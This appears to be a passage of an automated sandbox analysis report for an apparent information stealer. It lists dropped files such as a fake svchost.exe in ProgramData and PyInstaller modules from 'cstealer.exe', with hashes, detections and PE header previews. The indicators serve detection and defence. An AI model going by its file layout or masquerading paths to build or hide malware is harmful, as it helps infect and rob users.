                                                                                                                                                          Size (bytes):5617152
                                                                                                                                                          Entropy (8bit):7.71585644239634
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
                                                                                                                                                          MD5:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                                                                                          SHA1:53C870D62DCD6154052445DC03888CDC6CFFD370
                                                                                                                                                          SHA-256:BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                                                                                                                                          SHA-512:A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                          • Filename: hacn.exe, Detection: malicious, Browse
                                                                                                                                                          Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................

                                                                                                                                                          C:\ProgramData\svchost.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe
                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12576970
                                                                                                                                                          Entropy (8bit):7.995050972613473
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:196608:HWweM4sJFPpGAjMGhuPD5U4iDfyGgVwBdnpkYRMoSENsS3Mcj0kilsl:0SP8AxYDMDfDgVc6J4pMcj9Wsl
                                                                                                                                                          MD5:48B277A9AC4E729F9262DD9F7055C422
                                                                                                                                                          SHA1:D7E8A3FA664E863243C967520897E692E67C5725
                                                                                                                                                          SHA-256:5C832EDA59809A4F51DC779BB00BD964AAD42F2597A1C9F935CFB37F0888EF17
                                                                                                                                                          SHA-512:66DD4D1A82103CD90C113DF21EB693A2BFFDE2CDE41F9F40B5B85368D5A920B66C3BC5CADAF9F9D74DFD0F499086BEDD477F593184A7F755B7B210EF5E428941
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................-................,..............................................Rich...................PE..d...5L;f.........."....&.....r......0..........@....................................dy....`.....................................................x....p..e....0...#..............X...@...................................@............... ............................text............................... ..`.rdata...........0..................@..@.data....3..........................@....pdata...#...0...$..................@..@_RDATA.......`......................@..@.rsrc...e....p......................@..@.reloc..X...........................@..B................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DevxExecutor.exe.log

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\DevxExecutor.exe
                                                                                                                                                          File Type:CSV text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):654
                                                                                                                                                          Entropy (8bit):5.380476433908377
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                          MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                          SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                          SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                          SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\main.exe.log

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\main.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1678
                                                                                                                                                          Entropy (8bit):5.369913341429046
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:MxHKQwYHKGSI6ogLHitHTHhAHKKkyHpHNp51qHGIs0HKD:iqbYqGSI6ogLCtzHeqKkyJtp5wmj0qD
                                                                                                                                                          MD5:47EF549ED9A6077539E2B7E16049BF8F
                                                                                                                                                          SHA1:2129E12D767465A7F083AB906EB481DB88B47D0E
                                                                                                                                                          SHA-256:ABACC0BCEB0B100C7FDC2DDDF3CDDCCB8C048466FD886D0A015AB49D5B0A38A7
                                                                                                                                                          SHA-512:EB77CA4097CD1F268E6462D7FA3F864700B7113A637C755FCFF843A01DE6088A7B3588D2CFD1C6C9F018E93783019E338793E7EC5FC29BDBCE6E6604AEB91A99
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKey

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):64
                                                                                                                                                          Entropy (8bit):1.1940658735648508
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Nlllul3nqth:NllUa
                                                                                                                                                          MD5:851531B4FD612B0BC7891B3F401A478F
                                                                                                                                                          SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                                                                                                          SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                                                                                                          SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:@...e.................................&..............@..........

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\ ??? \Display (1).png

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):668200
                                                                                                                                                          Entropy (8bit):7.923775794069841
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:NDKZM3lTvUyWFppcFKsLCAazDu19Omt7A4Gg5lILO57f62j9BkyxB+H:N/1ZWFpprsza09Ou5GcoOF62ciBa
                                                                                                                                                          MD5:0452DA812BC1BEB6CAA747AB5F0A7384
                                                                                                                                                          SHA1:41ED1E923D1D62866799264FA578812BAA4AC8A8
                                                                                                                                                          SHA-256:9F717A08824B85FEA512C8EC71BBA8E12A18E4508FAD27573A194B55576793E0
                                                                                                                                                          SHA-512:04CEE11EFEED518196DFF2C67A1A007C3F2E1937B8E051DC15FC87484345AFE26656A95DE647295C5F3997ECC6EADE9085D5430880AACB81280F03F2C7BE0A57
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.....G...fVm..uf.L.3..3M......gz.{..h.zh@.{/$...{o......"...........B.!.....q.....2..*k.-Q{.gE..}..U[.H....;.c.I...<9..;&....g...H.G/....wXb.t.6w:_....'.Q|.2U...k.,...g.~.....c..M..;../,....].S...~....g.^.t.|hNL}Z<2.....!L.>...zh$S...~..v.I....sb.......L-....[.S..wq..=....w..TE..w-....l...]i..w...;.2.^....{..`...L...y....[.~>'..>?.o.i(..So.Y......7...}..Z..8.eo..+.So.q(...z.......z..}.[....u...k..z];.Z.z.z.Ogx.-..t..w.._.:..:-..O......+.)L...2..j8.T..by...9.{.U...AW..|~.O..L...=......g5.V../......W..U..6.80.q..i.......;xn..W....H._.k...../....}.K...^..9../..-...3....*...rb..q.uy...c=.........XC....-.;...zz..cm...%ml.~W....s..k.W..........2N......v.(uw...5..;.V.;.^P...l......H.......?.../...-.-..K>s.....\.....9..|j....;_....3.0..E.....N......pA....2_.s...b...k.c..w....t.{.W...s;..y.z...n....v.s...q.@n...w.c^...Y.......9%.Z}..EN.

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1829040
                                                                                                                                                          Entropy (8bit):6.564424655402829
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:c9EeNSPwEW3cFSI4Tfm3hvbHsjAJcAMkP3:c9Nzm31PMo3
                                                                                                                                                          MD5:65CCD6ECB99899083D43F7C24EB8F869
                                                                                                                                                          SHA1:27037A9470CC5ED177C0B6688495F3A51996A023
                                                                                                                                                          SHA-256:ABA67C7E6C01856838B8BC6B0BA95E864E1FDCB3750AA7CDC1BC73511CEA6FE4
                                                                                                                                                          SHA-512:533900861FE36CF78B614D6A7CE741FF1172B41CBD5644B4A9542E6CA42702E6FBFB12F0FBAAE8F5992320870A15E90B4F7BF180705FC9839DB433413860BE6D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nN\.. ... ... .Q..... .Q...e. .Q..... ..Q#... ..Q%... ..Q$... .8..... ..].... ...!.~. .rQ(... .rQ ... .wQ.... .rQ"... .Rich.. .........................PE..d.....d.........." ................................................................6U....`.................................................P...x................!.......T...........@..p............................A...............................................text...0........................... ..`.rdata...1.......2..................@..@.data....`... ...J..................@....pdata...!......."...P..............@..@.gfids...............r..............@..@.rsrc................t..............@..@.reloc...............~..............@..B................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\VCRUNTIME140.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98736
                                                                                                                                                          Entropy (8bit):6.474996871326343
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
                                                                                                                                                          MD5:F12681A472B9DD04A812E16096514974
                                                                                                                                                          SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
                                                                                                                                                          SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
                                                                                                                                                          SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\_bz2.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):83328
                                                                                                                                                          Entropy (8bit):6.532254531979707
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:douLz7p5Tcayt0KpkKWVa5cNRT8+smUxJIDtVH7SyD8Px:2uLz9meVamQ+sLxJIDtVHVsx
                                                                                                                                                          MD5:4101128E19134A4733028CFAAFC2F3BB
                                                                                                                                                          SHA1:66C18B0406201C3CFBBA6E239AB9EE3DBB3BE07D
                                                                                                                                                          SHA-256:5843872D5E2B08F138A71FE9BA94813AFEE59C8B48166D4A8EB0F606107A7E80
                                                                                                                                                          SHA-512:4F2FC415026D7FD71C5018BC2FFDF37A5B835A417B9E5017261849E36D65375715BAE148CE8F9649F9D807A63AC09D0FB270E4ABAE83DFA371D129953A5422CA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U...U...U...\.E._......W....+.V......X......]......Q......V......W...U..........]......T....).T......T...RichU...........PE..d...t.Vc.........." ...!.....^......,........................................P......nP....`.........................................p...H............0....... .. ........)...@..........T...........................p...@............................................text...O........................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\_ctypes.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):123768
                                                                                                                                                          Entropy (8bit):6.017133084000375
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:QC7Pgg3AwEWwSQJKoPfLSHcn0YJwyncXf9IDQPj6Exv:Qz5IX8jPfLSMJwykfoy
                                                                                                                                                          MD5:6A9CA97C039D9BBB7ABF40B53C851198
                                                                                                                                                          SHA1:01BCBD134A76CCD4F3BADB5F4056ABEDCFF60734
                                                                                                                                                          SHA-256:E662D2B35BB48C5F3432BDE79C0D20313238AF800968BA0FAA6EA7E7E5EF4535
                                                                                                                                                          SHA-512:DEDF7F98AFC0A94A248F12E4C4CA01B412DA45B926DA3F9C4CBC1D2CBB98C8899F43F5884B1BF1F0B941EDAEEF65612EA17438E67745962FF13761300910960D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[y..[y..[y..#.[y.. x..[y.. |..[y.. }..[y.. z..[y.. x..[y.O)}..[y.O)x..[y.).x..[y..[x.h[y.. t..[y.. y..[y.. ...[y.. {..[y.Rich.[y.................PE..d...n.Vc.........." ...!.............]...............................................[....`..........................................Q......TR..........................x)..............T...........................`...@............................................text............................... ..`.rdata...m.......n..................@..@.data...$=...p...8...b..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\_decimal.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):251768
                                                                                                                                                          Entropy (8bit):6.543870948107038
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:3JhhPXoWcz5HvcQpq9Sr9pmHboiYE9qWM53pLW1AmXYWtmVS9G:fNXoWcznq9Sr9pyKFh6eS9G
                                                                                                                                                          MD5:D47E6ACF09EAD5774D5B471AB3AB96FF
                                                                                                                                                          SHA1:64CE9B5D5F07395935DF95D4A0F06760319224A2
                                                                                                                                                          SHA-256:D0DF57988A74ACD50B2D261E8B5F2C25DA7B940EC2AAFBEE444C277552421E6E
                                                                                                                                                          SHA-512:52E132CE94F21FA253FED4CF1F67E8D4423D8C30224F961296EE9F64E2C9F4F7064D4C8405CD3BB67D3CF880FE4C21AB202FA8CF677E3B4DAD1BE6929DBDA4E2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\F1S.'_..'_..'_.._...'_..\^..'_..\Z..'_..\[..'_..\\..'_..\^..'_..U^..'_..'^..'_..\\..'_..\R..'_..\_..'_..\...'_..\]..'_.Rich.'_.................PE..d...k.Vc.........." ...!.v...<......|...............................................o.....`..........................................T..P....T..................H'......x)......P.......T...........................P...@............................................text...)u.......v.................. ..`.rdata...............z..............@..@.data....*...p...$...R..............@....pdata..H'.......(...v..............@..@.rsrc...............................@..@.reloc..P...........................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\_hashlib.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):63872
                                                                                                                                                          Entropy (8bit):6.166853300594844
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:18njpHxGkYjEEEJkn8cw6ThID5IJt7SyiPx:GnjpHxRJ8w6ThID5IJtEx
                                                                                                                                                          MD5:DE4D104EA13B70C093B07219D2EFF6CB
                                                                                                                                                          SHA1:83DAF591C049F977879E5114C5FEA9BBBFA0AD7B
                                                                                                                                                          SHA-256:39BC615842A176DB72D4E0558F3CDCAE23AB0623AD132F815D21DCFBFD4B110E
                                                                                                                                                          SHA-512:567F703C2E45F13C6107D767597DBA762DC5CAA86024C87E7B28DF2D6C77CD06D3F1F97EED45E6EF127D5346679FEA89AC4DC2C453CE366B6233C0FA68D82692
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g.......g..V....g..V....g..V....g..V....g..X....g.......g.......g...g..Qg..X....g..X....g..X.l..g..X....g..Rich.g..........................PE..d...u.Vc.........." ...!.T...~......@?....................................................`.............................................P.......................,........)......\...0}..T............................{..@............p..(............................text...YR.......T.................. ..`.rdata...N...p...P...X..............@..@.data...8...........................@....pdata..,...........................@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\_lzma.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):158080
                                                                                                                                                          Entropy (8bit):6.835761878596918
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:5mGf4k8d79MwyHiRr7tznf49mNoaGjQJplJIDe10Yhx:5Pf4FhMwyMAYOao6P
                                                                                                                                                          MD5:337B0E65A856568778E25660F77BC80A
                                                                                                                                                          SHA1:4D9E921FEAEE5FA70181EBA99054FFA7B6C9BB3F
                                                                                                                                                          SHA-256:613DE58E4A9A80EFF8F8BC45C350A6EAEBF89F85FFD2D7E3B0B266BF0888A60A
                                                                                                                                                          SHA-512:19E6DA02D9D25CCEF06C843B9F429E6B598667270631FEBE99A0D12FC12D5DA4FB242973A8351D3BF169F60D2E17FE821AD692038C793CE69DFB66A42211398E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X...6D..6D..6D..D..6D@.7E..6D@.3E..6D@.2E..6D@.5E..6DN.7E..6D..7E..6D..7D..6DN.;E..6DN.6E..6DN..D..6DN.4E..6DRich..6D........PE..d...~.Vc.........." ...!.d...........8..............................................O.....`..........................................%..L...\%..x....p.......P.......@...)......8.......T...........................p...@............................................text...~c.......d.................. ..`.rdata..............h..............@..@.data........@......................@....pdata.......P....... ..............@..@.rsrc........p.......4..............@..@.reloc..8............>..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\_queue.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):31104
                                                                                                                                                          Entropy (8bit):6.35436407327013
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:cQuCvO+MZFryl9SDCg6rXv5mkWsnTBq9ID7UJIYiSy1pCQYIPxh8E9VF0Nyb9:cl+yFp6rXRmk5s9ID7UeYiSyv7PxWER
                                                                                                                                                          MD5:FF8300999335C939FCCE94F2E7F039C0
                                                                                                                                                          SHA1:4FF3A7A9D9CA005B5659B55D8CD064D2EB708B1A
                                                                                                                                                          SHA-256:2F71046891BA279B00B70EB031FE90B379DBE84559CF49CE5D1297EA6BF47A78
                                                                                                                                                          SHA-512:F29B1FD6F52130D69C8BD21A72A71841BF67D54B216FEBCD4E526E81B499B9B48831BB7CDFF0BFF6878AAB542CA05D6326B8A293F2FB4DD95058461C0FD14017
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........MX..#...#...#.......#..."...#...&...#...'...#... ...#..."...#.Q."...#..."...#.......#...#...#.......#...!...#.Rich..#.........................PE..d...d.Vc.........." ...!.....8.......................................................K....`..........................................C..L....C..d....p.......`.......P...)..........p4..T...........................03..@............0..0............................text............................... ..`.rdata..R....0......................@..@.data...x....P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\_socket.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):78200
                                                                                                                                                          Entropy (8bit):6.239347454910878
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:HJlcAdpEVuju9/s+S+pJGQRivVia3i9IDQw17Sy+Px3sxi:H7ce+uju9/sT+pJGdvVp3i9IDQw1kxZ
                                                                                                                                                          MD5:8140BDC5803A4893509F0E39B67158CE
                                                                                                                                                          SHA1:653CC1C82BA6240B0186623724AEC3287E9BC232
                                                                                                                                                          SHA-256:39715EF8D043354F0AB15F62878530A38518FB6192BC48DA6A098498E8D35769
                                                                                                                                                          SHA-512:D0878FEE92E555B15E9F01CE39CFDC3D6122B41CE00EC3A4A7F0F661619F83EC520DCA41E35A1E15650FB34AD238974FE8019577C42CA460DDE76E3891B0E826
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....................*.......*.......*.......*.......$...............y.......$.......$.......$.......$.......Rich............................PE..d...s.Vc.........." ...!.l...........%.......................................P......h.....`.........................................@...P............0....... ..x.......x)...@..........T...............................@............................................text....k.......l.................. ..`.rdata..Dt.......v...p..............@..@.data...............................@....pdata..x.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\_sqlite3.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):118656
                                                                                                                                                          Entropy (8bit):6.2256831065058815
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:fArVnbGK9SGnh8u6rqMD6ciFCrl14zZvV9NdJRvdO5yt6sqM7VjEP/OsYpxtXr9T:YrVSK9SGnh8u6ESx5CVQP/yXZ
                                                                                                                                                          MD5:D4324D1E8DB7FCF220C5C541FECCE7E3
                                                                                                                                                          SHA1:1CAF5B23AE47F36D797BC6BDD5B75B2488903813
                                                                                                                                                          SHA-256:DDBED9D48B17C54FD3005F5A868DD63CB8F3EFE2C22C1821CEBB2FE72836E446
                                                                                                                                                          SHA-512:71D56D59E019CF42CEA88203D9C6E50F870CD5C4D5C46991ACBFF3AB9FF13F78D5DBF5D1C2112498FC7E279D41EE27DB279B74B4C08A60BB4098F9E8C296B5D8
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......pU..44..44..44..=Ls.04...O.64...O..54...O.94...O.<4...O.74...O.14...F.64..44.15...O.=4...O..54...O..54...O.54..Rich44..........................PE..d.....Vc.........." ...!............ ....................................................`..........................................Z..P....Z...........................)..............T...........................p...@............................................text............................... ..`.rdata..\...........................@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\_ssl.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):159616
                                                                                                                                                          Entropy (8bit):5.9948013841482926
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:qFrIQQey4VWR98w/PQQcXo8uOVrGxn+SQOXLkd1ItS+Q8YuAfxJIDt75EHx:eEeRV29//4QcJuOynyvxX
                                                                                                                                                          MD5:069BCCC9F31F57616E88C92650589BDD
                                                                                                                                                          SHA1:050FC5CCD92AF4FBB3047BE40202D062F9958E57
